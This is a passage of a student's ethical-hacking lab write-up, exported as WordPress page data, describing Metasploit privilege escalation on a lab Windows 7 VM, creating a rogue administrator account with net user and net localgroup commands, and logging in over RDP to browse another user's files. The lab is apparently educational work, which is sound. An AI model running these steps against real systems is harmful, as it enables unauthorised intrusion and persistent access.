https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC7-833x597.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC7-192x138.png 192w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC7.png 1293w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I went to the downloads folder on the Windows 7 VM and found the jkaur005.txt file.&nbsp;<\/p>\n\n\n\n<p>5C.) Background your current session, then gain administrator-level privileges on the remote system.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"897\" height=\"488\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC8.png\" alt=\"\" class=\"wp-image-267\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC8.png 897w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC8-300x163.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC8-768x418.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC8-833x453.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC8-192x104.png 192w\" sizes=\"(max-width: 897px) 100vw, 897px\" \/><\/figure>\n\n\n\n<p>I used the background command to get out of the current session, then I used the command, search uac to look for privilege escalation modules.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"888\" height=\"297\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC9.png\" alt=\"\" class=\"wp-image-268\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC9.png 888w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC9-300x100.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC9-768x257.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC9-833x279.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC9-192x64.png 192w\" sizes=\"(max-width: 888px) 100vw, 888px\" \/><\/figure>\n\n\n\n<p>I entered use 5 to select the right exploit module.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"913\" height=\"636\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.RIGHTC10.1.png\" alt=\"\" class=\"wp-image-270\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.RIGHTC10.1.png 913w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.RIGHTC10.1-300x209.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.RIGHTC10.1-768x535.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.RIGHTC10.1-833x580.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.RIGHTC10.1-192x134.png 192w\" sizes=\"(max-width: 913px) 100vw, 913px\" \/><\/figure>\n\n\n\n<p>I used the command, set session 1, to enter a session and made sure that the listening host and port information was correct.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"937\" height=\"930\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC11.png\" alt=\"\" class=\"wp-image-271\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC11.png 937w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC11-300x298.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC11-150x150.png 150w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC11-768x762.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC11-833x827.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC11-192x192.png 192w\" sizes=\"(max-width: 937px) 100vw, 937px\" \/><\/figure>\n\n\n\n<p>In order to check whether or not the exploit had worked, I printed the current working directory (C:\\Windows\\System32)&nbsp; and the result confirmed that the exploit was successful.&nbsp;<\/p>\n\n\n\n<p>6C.) Create a malicious account with your name and add this account to the administrator group. You need to complete this step on the Attacker Side.\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"917\" height=\"935\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC12.png\" alt=\"\" class=\"wp-image-272\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC12.png 917w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC12-294x300.png 294w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC12-768x783.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC12-833x849.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.rightC12-188x192.png 188w\" sizes=\"(max-width: 917px) 100vw, 917px\" \/><\/figure>\n\n\n\n<p>I used the command, shell, to enter a Windows shell. I used the command, net user \/add JaspritKaur Pizza246, to create a new user along with a password for the user. After that, I used the command, net localgroup administrators JaspritKaur \/add, to add the new malicious user into the administrators group.&nbsp;<\/p>\n\n\n\n<p>7C.) Remote access to the malicious account created in the previous step and browse the files belonging to the user, &#8220;Windows 7&#8221;, in RDP.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"838\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp-1024x838.png\" alt=\"\" class=\"wp-image-273\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp-1024x838.png 1024w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp-300x246.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp-768x629.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp-833x682.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp-192x157.png 192w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp.png 1142w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I used the command, rdesktop -u JaspritKaur -p Pizza246 192.168.10.9, to remotely access the Windows 7 VM.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"840\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp2-1024x840.png\" alt=\"\" class=\"wp-image-274\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp2-1024x840.png 1024w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp2-300x246.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp2-768x630.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp2-833x683.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp2-192x157.png 192w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp2.png 1140w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Opening the \u201cusers\u201d folder I found that there were three on the VM, one of which was the Windows 7 user.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"841\" src=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp3-1024x841.png\" alt=\"\" class=\"wp-image-275\" srcset=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp3-1024x841.png 1024w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp3-300x246.png 300w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp3-768x631.png 768w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp3-833x684.png 833w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp3-192x158.png 192w, https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-content\/uploads\/sites\/41176\/2026\/05\/lab4.remotedp3.png 1132w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>The files belonging to the Windows 7 user.&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>TASK A:&nbsp; I used the command, nmap 192.168.10.14 to do a general scan on the Windows XP machine, then I used the command nmap -p445 192.168.10.14 to ensure that port 445 was open.&nbsp; I used the command, search ms08_067_netapi, to get more information on the module. I was presented with one option, with 0 as &hellip; <a href=\"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/ethical-hacking\/\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">Ethical Hacking<\/span><\/a><\/p>\n","protected":false},"author":24635,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-json\/wp\/v2\/pages\/232"}],"collection":[{"href":"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-json\/wp\/v2\/users\/24635"}],"replies":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-json\/wp\/v2\/comments?post=232"}],"version-history":[{"count":4,"href":"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-json\/wp\/v2\/pages\/232\/revisions"}],"predecessor-version":[{"id":276,"href":"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-json\/wp\/v2\/pages\/232\/revisions\/276"}],"wp:attachment":[{"href":"https:\/\/sites.wp.odu.edu\/jasprit-kaur-2-ids493spring2026\/wp-json\/wp\/v2\/media?parent=232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}